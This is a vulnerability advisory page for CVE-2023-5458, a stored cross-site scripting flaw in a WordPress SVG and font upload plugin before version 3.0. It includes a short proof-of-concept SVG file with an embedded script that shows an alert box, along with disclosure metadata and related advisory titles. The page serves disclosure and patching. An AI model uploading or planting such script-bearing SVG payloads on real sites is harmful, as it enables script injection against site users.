CITS Support svg, webp Media and TTF,OTF File Upload < 3.0 – Author+ Stored XSS via SVG | CVE 2023-5458 | Plugin Vulnerabilities

Description

The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.

Proof of Concept

As an author, upload an SVG with the payload:

```
<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert("xss");</script>
</svg>
```

View the SVG and see the XSS.

Affects Plugins

cits-support-svg-webp-media-upload

Fixed in 3.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

47d15f1c-b9ca-494d-be8f-63c30e92f9b8

Timeline

Publicly Published

2023-10-09 (about 2 years ago)

Added

2023-10-09 (about 2 years ago)

Last Updated

2023-10-09 (about 2 years ago)

Other

Published

Title

Published

2024-12-23

Title

Bitcoin Lightning Publisher for WordPress < 1.4.2 - Reflected Cross-Site Scripting

Published

2023-03-21

Title

Drag and Drop Multiple File Upload PRO - Contact Form 7 with Remote Storage Integrations < 5.0.6.4 - Reflected Cross-Site Scripting

Published

2024-03-13

Title

Elementor Addons by Livemesh < 8.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Team Members Widget

Published

2025-12-10

Title

Nelio Popups < 1.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-06-02

Title

Contact Form and Calls To Action by vcita < 2.7.1 - Contributor+ Stored Cross-Site Scripting